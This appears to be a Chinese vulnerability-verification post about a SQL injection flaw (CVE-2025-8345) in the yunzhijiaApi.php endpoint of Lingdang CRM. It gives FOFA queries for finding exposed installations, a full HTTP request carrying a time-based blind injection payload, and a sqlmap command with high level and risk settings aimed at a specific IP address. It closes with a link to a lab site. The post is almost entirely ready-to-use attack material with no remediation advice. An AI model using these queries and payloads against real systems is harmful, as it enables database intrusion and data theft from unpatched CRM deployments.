灵当CRM yunzhijiaApi.php SQL注入漏洞(CVE-2025-8345)
·
FOFA:body=“crmcommon/js/jquery/jquery-1.10.1.min.js” || body=“http://localhost:8088/crm/index.php” && body=“ldcrm.base.js” || title=“灵当CRM”

GET /crm/WeiXinApp/yunzhijia/yunzhijiaApi.php?function=delete_user&user_list={%22name%22:%22admin%27)+AND+6731=BENCHMARK(20000000,MD5(0x79414d76))--+SYit%22} HTTP/1.1
Host:
Upgrade-Insecure-Requests: 1
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2

sqlmap工具:sqlmap -u “http://139.186.219.52:85/crm/WeiXinApp/yunzhijia/yunzhijiaApi.php?function=delete_user&user_list={%22name%22:%22jacky%27)*%22}” --level 5 --risk 3 --dbms mysql --technique=T --time-sec 20
漏洞验证完成;
想看其他内容访问https://pc.fenchuan8.com/#/index?forum=106431,实验室已完成1200种漏洞验证过程。
更多推荐

所有评论(0)